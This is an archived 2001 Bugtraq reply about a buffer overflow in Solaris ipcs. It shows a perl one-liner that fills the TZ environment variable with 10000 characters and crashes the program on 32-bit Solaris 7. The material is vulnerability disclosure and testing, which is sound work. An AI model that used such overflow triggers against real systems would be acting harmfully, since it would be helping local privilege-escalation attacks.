[20261] in bugtraq
Re: Solaris ipcs vulnerability
daemon@ATHENA.MIT.EDU (Sven C. Koehler)
Tue Apr 17 13:19:36 2001
Mail-Followup-To: "Sven C. Koehler" <schween@snafu.de>,
Robert Sink <sinkr@CBL.UMCES.EDU>, BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-ID: <20010417135817.A10354@zedat.fu-berlin.de>
Date: Tue, 17 Apr 2001 13:58:17 +0200
Reply-To: schween@snafu.de
From: "Sven C. Koehler" <schween@snafu.de>
X-To: Robert Sink <sinkr@CBL.UMCES.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <15067.23174.388984.783662@tempermental.cbl.umces.edu>; from
sinkr@CBL.UMCES.EDU on Mon, Apr 16, 2001 at 04:48:06PM -0400
On Mon, Apr 16, 2001 at 04:48:06PM -0400, Robert Sink wrote:
> I've tried:
>
> TZ=`/usr/local/bin/perl -e 'print "A"x1107'`
>
> ...on... both 64 bit Solaris 8 and Solaris 7 (we have no 32 bit
> machines here) and cannot get the programs to crash. They just
> happily display the A's, plus the other information and exit normally.
>
> Solaris 7: SunOS xxx 5.7 Generic_106541-12 sun4u sparc
> Solaris 8: SunOS xxx 5.8 Generic_108528-05 sun4u sparc
>
It worked on my 32 bit Solaris 7 only when I made the TZ variable larger.
$ TZ=`perl -e 'print "A" x 10000'`
$ ipcs
Segmentation Fault
SunOS blue 5.7 Generic_106541-11 sun4u sparc SUNW,UltraSPARC-IIi-Engine
